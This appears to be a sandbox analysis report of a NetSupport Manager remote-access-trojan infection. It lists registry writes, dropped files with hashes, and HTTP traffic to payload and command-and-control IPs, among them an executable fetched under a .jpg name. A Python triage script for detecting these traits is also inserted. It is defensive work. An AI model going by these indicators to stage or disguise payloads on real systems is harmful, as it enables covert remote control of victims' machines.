client32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2268
client32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E
LanguageList
en-US
2268
client32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E
@"%windir%\System32\ie4uinit.exe",-738
Start Internet Explorer without ActiveX controls or browser extensions.

Files activity

Executable files
49
Suspicious files
9
Text files
16
Unknown types
7

Dropped files

PID
Process
Filename
Type
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\msvcr100.dll
executable
MD5: 0e37fbfa79d349d672456923ec5fbbe3
SHA256: 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\IPCTL32.DLL
executable
MD5: 67184a4406f5ecb71c21583987038708
SHA256: e70cb83658b4fb9f7266ccf528219c835f0efbe5e06872d4f5fad8cd496b71f2
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\PCIinv.dll
executable
MD5: 4a92f7d4924fda20d6a60096c59c282b
SHA256: 443dfc6205d85b1c32bb38aa9734a5e18bbbc8526c869552331b2d81b9b0c032
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\IPBR32.DLL
executable
MD5: 7597d4434eda66a2d118279cca71881e
SHA256: 46aab21e20c6d2b2bef9baf26ea746186f5a5894cae04a2c0ed56160ef6874ee
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\pcisys.sys
executable
MD5: 4b5f06667db76849628ddf0027d3bcf4
SHA256: 0adfd29f255a071706ef207d720bd206458168d535758216222925c3b3d89c95
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\PCIHOOKS.DLL
executable
MD5: 3eedd8357b86b6a2f90188063e33d797
SHA256: 574eda2b8561364445e38f59ba93fb12210d07e1f80347bf67abb2a87e6891e9
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\PCIMON.DLL
executable
MD5: 49549e31838886d755af38995b0c263d
SHA256: 47271356af5597a6704c654c5bc42a05a7cca9fde928b99f121ddc86bec71aa5
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\client32.exe
executable
MD5: 8d9709ff7d9c83bd376e01912c734f0a
SHA256: 49a568f8ac11173e3a0d76cff6bc1d4b9bdf2c35c6d8570177422f142dcfdbe3
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\PCIVDD.DLL
executable
MD5: 93bd1d145701c19394cce7b54e241631
SHA256: 19c56caee0519fd60c353fcf6ece8344fa09a652a0a3c88840aab94d6a0ecf43
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\gdihook5.dll
executable
MD5: 367a4e8f632f0f1d05b8ab9922dab331
SHA256: 8423c1be72387638c0143b8bc0edc91a9f4ad7262af8baec1c2464ec45be98a0
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\PCIMSG.DLL
executable
MD5: 9d941b1a72abaa8cde01720eac699f2c
SHA256: 43b95c63be137a64329b346027a647959779d28074870972548f30dcd73c4370
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\NBBR32.DLL
executable
MD5: d91b5be1c3426035eab693dec962fbf7
SHA256: 80ee52d07ff8ccb745c6cb67b44523b6d38a3a3086a826c890080b79415f5124
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\CryptPak.dll
executable
MD5: 92fd46bd92d218ee3f1e800c1c5daef8
SHA256: 7e6616f762ab9f9850090d1c89507d2851222cfa1ff66982f84ac214c6fde570
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\pciconn.exe
executable
MD5: 00ad420e7d2d2bd5e889aaad47eac553
SHA256: 378a03b6dbf7bd00bf0545378e10ab4b8fbd8d8f3f8273ca1adfc592f5a8e368
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\pscrinst.dll
executable
MD5: 4725834d0416c9cbd376ff01f94f90f9
SHA256: 7e69de5b431e68536124f70815726773d4b8400d6999b1f5d891e44a67ccbab4
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\NBCTLA3.DLL
executable
MD5: 881ffb9fa34ce6b7f5239a4241609774
SHA256: 9298eb3fadb19786be826159dd2103a84927b8f4dc3613e159724e19a47e398b
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\clhook4.dll
executable
MD5: 6f787b2a2930ef76c468ee410adc86a3
SHA256: 47e7c7c11b8a8fab19f4f30c2f023b741e6057190b80a928e48d37af0e08ad16
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\PCICL32.DLL
executable
MD5: 00587238d16012152c2e951a087f2cc9
SHA256: 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\pcimonhook.dll
executable
MD5: 8c72f88ae953a8fbb33e885b7334e3d1
SHA256: 14dce1aeeea19bd346fc2e320e8b50449a48eb1e455e5faf8a29166b1d61c21f
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\NBCTLA4.DLL
executable
MD5: ffadb11ce73295fea7b4585a3bd927a9
SHA256: b6f85fff5bad3b6a1b75b5a4b3b34ef3db132c8be024894c175ac196b6c57be0
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\DBI.EXE
executable
MD5: 5d64121ab6415ec11effbd6d6761d46a
SHA256: 689facaf0e03034c42be4a4473e806bcd5272a40d7cf4e8b09083fff8744f278
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\pcigina.dll
executable
MD5: bbcecda514b5e4070bee6a1aeb86d99d
SHA256: b312cfc8995e1ea1654639618c931b9c8aaf791be87337949343e3fa0825c312
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\remcmdstub.exe
executable
MD5: 2a77875b08d4d2bb7b654db33a88f16c
SHA256: 8ad9c598c1fde52dd2bfced5f953ca0d013b0c65feb5ded73585cfc420c95a95
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\NBCTLA0.DLL
executable
MD5: 00d5990a151db3d1d59bb4e1f0e7a04f
SHA256: 109dce2fc3d0a99c8086595a4a33286c4c3bf4283a28068f88ab581cf2ec8c1f
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\gdihook5.sys
executable
MD5: 85ed5e4fa9a8b4776fa82b8bef5f2791
SHA256: 044f4a62b98a132de1f752fb33d654640d09221e74ebe1c062e6a276d22e5b69
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\pcicfgui.exe
executable
MD5: f44ebf7a82367c7b2d0702ad89bde583
SHA256: a1712260440eb8840da37854c374c7f4f6542c6ec16df61784428efbab658830
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\TCBR32.DLL
executable
MD5: b2a48c7fce59592ee7ad50472987ec9f
SHA256: 5eff3856b5e15826e2eed7c22e5fd8ca411b03c38b28672e003947414f515678
4028 WinSupport.exe | C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\NBCTLA7.DLL | executable | MD5: ab45c36683663336434f96d2ac97c65a | SHA256: d6ed416b516b9b1002d84ce344039c86b3bbcceffb36fdf70e063ff6b85bdb90
4028 WinSupport.exe | C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\AudioCapture.dll | executable | MD5: 771e97f76e213ed2d2b0b7c6639e1c68 | SHA256: 8af1dd14b521d96d711b0ec5e1651d961b5f0d6ac18fbee3ef66e065e9766f72
4028 WinSupport.exe | C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\pcicapi.dll | executable | MD5: dcde2248d19c778a41aa165866dd52d0 | SHA256: 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917
4028 WinSupport.exe | C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\shfolder.dll | executable | MD5: c9e2eebb7bd947fb6499c7637cedd16d | SHA256: 24083daed66232a64c5219eb134bd8fab914c37aeb3c31376b3cea19b4259d18
4028 WinSupport.exe | C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\NBCTLA5.DLL | executable | MD5: 3d227920379218138db4bfe1bd6c3da2 | SHA256: 903ebcbc1eda6d1308f19531f9c5f5a8cf620dcc7a68da4d40d56d111a12df20
3692 KB24115436.exe | C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport.exe | executable | MD5: 94cc7202ee76e7d650414ede964ebd9b | SHA256: 195e3d2424ab364edce6f54ccc3d21641cc6b3323ce01358951e98a064d8e85d
4028 WinSupport.exe | C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\NBCTLA1.DLL | executable | MD5: 591d271da2b308cc83f06a3fc3cd0cc5 | SHA256: 41ed0449f1d00fdcf0ed749437bd273610fffcaa34d7f51aab7542677c8e4a6c
4028 WinSupport.exe | C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\TCCTL32.DLL | executable | MD5: eab603d12705752e3d268d86dff74ed4 | SHA256: 6795d760ce7a955df6c2f5a062e296128efdb8c908908eda4d666926980447ea
4028 WinSupport.exe | C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\NBCTLA2.DLL | executable | MD5: 739ee44735a13414649cf9d8aec2effb | SHA256: 7d5c2a71d6551df029de3aeca5b620171ca560800b9bab8942164e198cf2d469
4028 WinSupport.exe | C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\nsmexec.exe | executable | MD5: eb0e2ecaa54f94233735c0c353166362 | SHA256: 2634a91c1a844f53598f83ba0f3381dfb062a3986391454a70ffcecd8d581590
4028 WinSupport.exe | C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\nskbfltr.sys | executable | MD5: 21864538f3a0992152d0d889837df58b | SHA256: 8bd445ee6ddb44e88fe8b650111997004c86bdcfd9e6b16e063c67b32eb8e66b
4028 WinSupport.exe | C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\VolumeControlWXP.DLL | executable | MD5: 489ec38ad9fac51a445fd706da4737cb | SHA256: 15e8e30d4d997a1b3e09c87a833be8f8c05b7754398709fea6a08f5b04f83b43
4028 WinSupport.exe | C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\NBCTLA6.DLL | executable | MD5: 20a6e4318b4e0b342f0b93255c418c82 | SHA256: 1a553ac404a36dfaa372ac6f0de0987ed1bb17bf6e927092bb4130e9dd4b1133
3620 WScript.exe | C:\Users\admin\AppData\Local\Temp\temp69.exe | executable | MD5: b4c837b395483e5f430d00000b1d4c31 | SHA256: 3f47f2175f27c02c36e7aa9fd485ef30bb03531e3c0f5d176f727e46b3a80c72
4028 WinSupport.exe | C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\PCICHEK.DLL | executable | MD5: a0b9388c5f18e27266a31f8c5765b263 | SHA256: 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a
4028 WinSupport.exe | C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\WdfCoInstaller01005.dll | executable | MD5: f9cf2db8b99dc50eab538c4d860ac1a4 | SHA256: 865864a32aee78e588764f37847522fdb0bd1940ecd73b3c49d8f68b4d5bad71
4028 WinSupport.exe | C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\NSToast.exe | executable | MD5: a1ed96625d5714c5700290aa952b1986 | SHA256: d4becbba58d0a594f96e3670abc907a60dfdc5f90ebe843626012a44506bd3a9
3620 WScript.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\1[1].jpg | executable | MD5: b4c837b395483e5f430d00000b1d4c31 | SHA256: 3f47f2175f27c02c36e7aa9fd485ef30bb03531e3c0f5d176f727e46b3a80c72
4028 WinSupport.exe | C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\nspscr.sys | executable | MD5: 8822efbbf1cf663bd3b70510adff15d5 | SHA256: 50401bc698658360de5eb23c38648e06f81235c98612a1eaac9f65718d72e200
4028 WinSupport.exe | C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\Nbctl32.dll | executable | MD5: 96d283f596f720c7bdce0564030fd242 | SHA256: 8ed968d09ae10f2aebc75d8b4d93e214ed3b38ff3af4e4f6ffbe52577c6bd281
4028 WinSupport.exe | C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\HTCTL32.DLL | executable | MD5: 2d3b207c8a48148296156e5725426c7f | SHA256: edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796
3896 temp69.exe | C:\Temp\KB24115436.exe | executable | MD5: 29b47d1f3d4417b4e50e5b1c0005298b | SHA256: aacadf7b3bfc2ac8a9a342e5372c77218efa9c67602c3a15441094170a5f52d4
3076 iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\favicon[1].jpg | –– | MD5: –– | SHA256: ––
4028 WinSupport.exe | C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\NSM.ini | text | MD5: 88b1dab8f4fd1ae879685995c90bd902 | SHA256: 60fe386112ad51f40a1ee9e1b15eca802ced174d7055341c491dee06780b3f92
2268 client32.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\loca[1].htm | binary | MD5: c0cb5f0fcf239ab3d9c1fcd31fff1efc | SHA256: d03502c43d74a30b936740a9517dc4ea2b2ad7168caa0a774cefe793ce0b33e7
4028 WinSupport.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.lnk | lnk | MD5: 6c3c39c3cb0be68ef1fb642071989723 | SHA256: 787abfda449d6a14bcb55801f82877380dfd2ae10934da915821caa19470796b
2268 client32.exe | C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\client32.1.err | text | MD5: 89a1261a5480eb0fc48067fcf29eafed | SHA256: f2d14f0d69ceced21b0ceaf9a5a7b0b985161a9f71bc2aea1c0ca2917669f5c5
4028 WinSupport.exe | C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\client32.ini | text | MD5: 182318fa51db5daa7008f8ed91f3fda9 | SHA256: 00c60d416c139f841e1be8a1f5469c7747a62a78ccac4aff82b4b9ee4b2bef33
4028 WinSupport.exe | C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\gdihook5.INF | binary | MD5: 703c7774b981e5d02e058340a27a5b75 | SHA256: 4cfca868959f4e1b85bfd6b8a970ae06c0810d9c341f260df3ab8479089500e9
4028 WinSupport.exe | C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\Control.kbd | binary | MD5: 4d9e1c4b8a78f4c8d6ce5235d42c8f1e | SHA256: 6d098726cbcdb392bc3a43d4d218072f5cadd4b82d83ada87bce65f7642af602
2268 client32.exe | C:\Users\admin\AppData\Local\NetSupport\NetSupport Manager\USER-PC_SW.bin | binary | MD5: a05c90ade114ebc52c3ebfc782f1a0e1 | SHA256: 1373df395d4b10bcd38e7d3600b4f99409ad6f5d21b9f18a55164a44538f40ba
4028 WinSupport.exe | C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\nspscr.inf | binary | MD5: 967d9bd8558dca9df7f4fdd6f3284db5 | SHA256: 914ea51fd68d4b872f9a1c9ca002081418e36a8cceae92772fb458625d823bfb
4028 WinSupport.exe | C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\nskbfltr.inf | binary | MD5: 26e28c01461f7e65c402bdf09923d435 | SHA256: d96856cd944a9f1587907cacef974c0248b7f4210f1689c1e6bcac5fed289368
2268 client32.exe | C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\client32.1_2019_07_11_151408.dmp | dmp | MD5: 31ff3c9ba467a39513e39bc4baff3519 | SHA256: afc0ae1d801047f86490aa95b063b53d7d592305a96b51350d5d8ac22935ce0a
2268 client32.exe | C:\Users\admin\AppData\Local\NetSupport\NetSupport Manager\USER-PC_HF.bin | binary | MD5: 442597e89556b8e106f7dc4b68194be1 | SHA256: 5d5ae155222084e6d4b290aa6181df03f42dd8c28bbad222d69a9d1344c56ca2
2432 WScript.exe | C:\Users\admin\AppData\Local\Temp\temp.vbs | text | MD5: b4a5edcf8bbd2415f41e412cc72da63c | SHA256: 590ab0dae68ce55e1551b1227ade50b16eae76059a49b3eeae05ad4c793ae791
2432 WScript.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\load2[1].jpg | text | MD5: b4a5edcf8bbd2415f41e412cc72da63c | SHA256: 590ab0dae68ce55e1551b1227ade50b16eae76059a49b3eeae05ad4c793ae791
3872 powershell.exe | C:\Users\admin\Desktop\documentation.vbs | text | MD5: c5a5998b01a477ed318a8934894786d5 | SHA256: 60993fb444ed517afb422a96470a2df8a2e80a5c1b5525b9aafce77a078ef8a6
3872 powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | MD5: 4b92a079d7f4dfa0dfe9125e60fe7814 | SHA256: e96b52bc25ae8ba162760c1f5159606ed78eb1ec4cba0f98aad2915ae22d8e04
3872 powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF102627.TMP | binary | MD5: 4b92a079d7f4dfa0dfe9125e60fe7814 | SHA256: e96b52bc25ae8ba162760c1f5159606ed78eb1ec4cba0f98aad2915ae22d8e04
3872 powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YHFMM8KG4U2Z6E28PO8Q.temp | –– | MD5: –– | SHA256: ––
4028 WinSupport.exe | C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\NSM.LIC | text | MD5: 7067af414215ee4c50bfcd3ea43c84f0 | SHA256: 2050cc232710a2ea6a207bc78d1eac66a4042f2ee701cdfeee5de3ddcdc31d12
3076 iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\favicon[1].ico | –– | MD5: –– | SHA256: ––
3076 iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012019071120190712\index.dat | dat | MD5: 6086a7b6e9bf8ca05d5df8e9f2932792 | SHA256: f08ed0a694f14e8a52afb52d3fa4a461cd6e3f85d04b8aec8566da8725092e88
3556 iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012019071120190712\index.dat | dat | MD5: 10df8a304f3729376e6d69a0f9d83d14 | SHA256: 94bdf3c304cfc707fde2ddf46956ae4e92ae8834d337ada1d89ccd76039a1970
3556 iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\MSIMGSIZ.DAT | smt | MD5: 60272cba5ad84466b761ccb17bc51037 | SHA256: ed2a144c57ac894562da29c3ed8df7a741f5a07e4c053cd366417c3574ec4cae
3556 iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat | dat | MD5: 7470b2ffef14ba4a118cb1782ad461a4 | SHA256: 39f398161a64403afdc5756bb6edcb17f56ca5947b27cae35a3cf3fd4e0ad5a8
3556 iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\FXBC15DU\radiobox-online_org[1].htm | html | MD5: 14bae31bdb6ce0216a7c13a5f6ffaf83 | SHA256: 07f2f4c293ef11d35c1f0ed0816cb022e6da1407a16197a84a5198015e7ae49c
3556 iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\03N2YC2E\radiobox-online_org[1].txt | –– | MD5: –– | SHA256: ––
3076 iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\favicon[1].png | image | MD5: 9fb559a691078558e77d6848202f6541 | SHA256: 6d8a01dc7647bc218d003b58fe04049e24a9359900b7e0cebae76edf85b8b914
3076 iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | –– | MD5: –– | SHA256: ––
3076 iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\favicon[1].ico | –– | MD5: –– | SHA256: ––
3556 iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat | dat | MD5: 915f37ea4d5f1e1b565f90e7fcf14c99 | SHA256: 441b9ca9853c8568d247470c709fc9803ea2c14d405d4aca337b25987f9de49d
3556 iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\G1Z2SDJM\desktop.ini | ini | MD5: 4a3deb274bb5f0212c2419d3d8d08612 | SHA256: 2842973d15a14323e08598be1dfb87e54bf88a76be8c7bc94c56b079446edf38
3556 iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\FXBC15DU\desktop.ini | ini | MD5: 4a3deb274bb5f0212c2419d3d8d08612 | SHA256: 2842973d15a14323e08598be1dfb87e54bf88a76be8c7bc94c56b079446edf38
3556 iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\O53CQXBK\desktop.ini | ini | MD5: 4a3deb274bb5f0212c2419d3d8d08612 | SHA256: 2842973d15a14323e08598be1dfb87e54bf88a76be8c7bc94c56b079446edf38
3556 iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\03N2YC2E\desktop.ini | ini | MD5: 4a3deb274bb5f0212c2419d3d8d08612 | SHA256: 2842973d15a14323e08598be1dfb87e54bf88a76be8c7bc94c56b079446edf38
3076 iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini | ini | MD5: 4a3deb274bb5f0212c2419d3d8d08612 | SHA256: 2842973d15a14323e08598be1dfb87e54bf88a76be8c7bc94c56b079446edf38
3556 iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\desktop.ini | ini | MD5: 4a3deb274bb5f0212c2419d3d8d08612 | SHA256: 2842973d15a14323e08598be1dfb87e54bf88a76be8c7bc94c56b079446edf38
3556 iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\desktop.ini | ini | MD5: 4a3deb274bb5f0212c2419d3d8d08612 | SHA256: 2842973d15a14323e08598be1dfb87e54bf88a76be8c7bc94c56b079446edf38

Find more information about the static content and download it in the full report
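The file list above is more useful once it is machine-readable. The following is an added example for this page, not ANY.RUN's code: it parses the raw export layout (each file as six lines: PID, process, path, type, MD5, SHA256) and flags the three host-side patterns this report shows, namely a PE written under an image name (1[1].jpg and temp69.exe share one hash), NetSupport Manager components under a user profile rather than Program Files, and a .lnk in the Startup folder. The sample records are copied from the report; the rule set, the marker-file list and the path patterns are the editor's assumptions.

```python
"""Parse the raw six-line-per-file export of a sandbox Files table and triage it.

Added example, not part of the ANY.RUN report. Detection rules are assumptions
chosen to match what this report shows, not sandbox output.
"""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class FileRecord:
    pid: int
    process: str
    path: str
    kind: str      # "executable", "text", "lnk", ... or "––" when the sandbox had none
    md5: str
    sha256: str

    @property
    def name(self) -> str:
        return self.path.rsplit("\\", 1)[-1].lower()


# Files a NetSupport Manager client ships with (assumption: a legitimate install
# keeps them under Program Files, a RAT deployment drops them under %APPDATA%).
NETSUPPORT_MARKERS = {
    "client32.exe", "client32.ini", "nsm.lic", "nsm.ini", "pcicapi.dll",
    "pcichek.dll", "htctl32.dll", "tcctl32.dll", "nskbfltr.sys",
}
USER_PROFILE = re.compile(r"^[a-z]:\\users\\[^\\]+\\appdata\\", re.I)
STARTUP_LNK = re.compile(r"\\start menu\\programs\\startup\\[^\\]+\.lnk$", re.I)
IMAGE_EXT = re.compile(r"\.(jpe?g|png|gif|bmp|ico)$", re.I)
MISSING = "––"


def parse_records(text: str) -> list[FileRecord]:
    """Turn the six-lines-per-file layout into FileRecord objects."""
    lines = [ln.strip() for ln in text.strip().splitlines() if ln.strip()]
    if len(lines) % 6:
        raise ValueError("input is not a whole number of 6-line records")
    records = []
    for i in range(0, len(lines), 6):
        pid, proc, path, kind, md5, sha = lines[i:i + 6]
        records.append(FileRecord(
            pid=int(pid), process=proc, path=path, kind=kind,
            md5=md5.split(":", 1)[1].strip(),       # "MD5:  ––" -> "––"
            sha256=sha.split(":", 1)[1].strip(),
        ))
    return records


def triage(records: list[FileRecord]) -> list[tuple[str, str]]:
    """Return (rule, evidence) pairs, in record order, then cross-record rules."""
    findings = []
    names_by_sha = defaultdict(set)
    for r in records:
        if r.kind == "executable" and IMAGE_EXT.search(r.name):
            findings.append(("pe_with_image_extension", r.path))
        if r.name in NETSUPPORT_MARKERS and USER_PROFILE.search(r.path):
            findings.append(("netsupport_in_user_profile", r.path))
        if STARTUP_LNK.search(r.path):
            findings.append(("startup_lnk_persistence", r.path))
        if r.kind == "executable" and r.sha256 != MISSING:
            names_by_sha[r.sha256].add(r.name)
    # One PE under both an image name and an .exe name: downloaded as a
    # "picture", renamed and run.
    for sha, names in names_by_sha.items():
        if any(IMAGE_EXT.search(n) for n in names) and any(n.endswith(".exe") for n in names):
            findings.append(("renamed_payload", sha))
    return findings


# Records copied from the report (constructed input for the example).
SAMPLE = r"""
3620
WScript.exe
C:\Users\admin\AppData\Local\Temp\temp69.exe
executable
MD5: b4c837b395483e5f430d00000b1d4c31
SHA256: 3f47f2175f27c02c36e7aa9fd485ef30bb03531e3c0f5d176f727e46b3a80c72
3620
WScript.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\1[1].jpg
executable
MD5: b4c837b395483e5f430d00000b1d4c31
SHA256: 3f47f2175f27c02c36e7aa9fd485ef30bb03531e3c0f5d176f727e46b3a80c72
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\CodeIntegrity\WinSupport\client32.ini
text
MD5: 182318fa51db5daa7008f8ed91f3fda9
SHA256: 00c60d416c139f841e1be8a1f5469c7747a62a78ccac4aff82b4b9ee4b2bef33
4028
WinSupport.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.lnk
lnk
MD5: 6c3c39c3cb0be68ef1fb642071989723
SHA256: 787abfda449d6a14bcb55801f82877380dfd2ae10934da915821caa19470796b
"""

if __name__ == "__main__":
    for rule, evidence in triage(parse_records(SAMPLE)):
        print(f"{rule:28} {evidence}")
```

Run against the four sample records it reports the image-named PE, client32.ini under AppData, the Startup .lnk, and finally the shared hash as a renamed payload; desktop.ini copies with identical hashes across cache folders are deliberately not flagged because the cross-record rule only looks at executables.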

Network activity

HTTP(S) requests: 19
TCP/UDP connections: 12
DNS requests: 5
Threats: 28

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
3076 | iexplore.exe | GET | 200 | 204.79.197.200:80 | http://www.bing.com/favicon.ico | US | image | whitelisted
2432 | WScript.exe | GET | 200 | 45.12.215.157:80 | http://45.12.215.157/src/load2.jpg | unknown | text | suspicious
3620 | WScript.exe | GET | 200 | 45.12.215.157:80 | http://45.12.215.157/images/1.jpg | unknown | executable | suspicious
2268 | client32.exe | POST | 200 | 5.45.73.63:4151 | http://5.45.73.63/fakeurl.htm | NL | text | binary | suspicious
2268 | client32.exe | POST | 200 | 5.45.73.63:4151 | http://5.45.73.63/fakeurl.htm | NL | binary | binary | suspicious
2268 | client32.exe | POST | –– | 5.45.73.63:4151 | http://5.45.73.63/fakeurl.htm | NL | binary | –– | –– | suspicious
2268 | client32.exe | GET | 200 | 195.171.92.116:80 | http://geo.netsupportsoftware.com/location/loca.asp | GB | binary | malicious
2268 | client32.exe | POST | –– | 5.45.73.63:4151 | http://5.45.73.63/fakeurl.htm | NL | binary | –– | –– | suspicious
3620 | WScript.exe | GET | 404 | 45.12.215.157:80 | http://45.12.215.157/images/2.jpg | unknown | html | suspicious
3620 | WScript.exe | GET | 404 | 45.12.215.157:80 | http://45.12.215.157/images/2.jpg | unknown | html | suspicious
3620 | WScript.exe | GET | 404 | 45.12.215.157:80 | http://45.12.215.157/images/3.jpg | unknown | html | suspicious
3620 | WScript.exe | GET | 404 | 45.12.215.157:80 | http://45.12.215.157/images/2.jpg | unknown | html | suspicious
3620 | WScript.exe | GET | 404 | 45.12.215.157:80 | http://45.12.215.157/images/3.jpg | unknown | html | suspicious
3620 | WScript.exe | GET | 404 | 45.12.215.157:80 | http://45.12.215.157/images/4.jpg | unknown | html | suspicious
3620 | WScript.exe | GET | 404 | 45.12.215.157:80 | http://45.12.215.157/images/2.jpg | unknown | html | suspicious
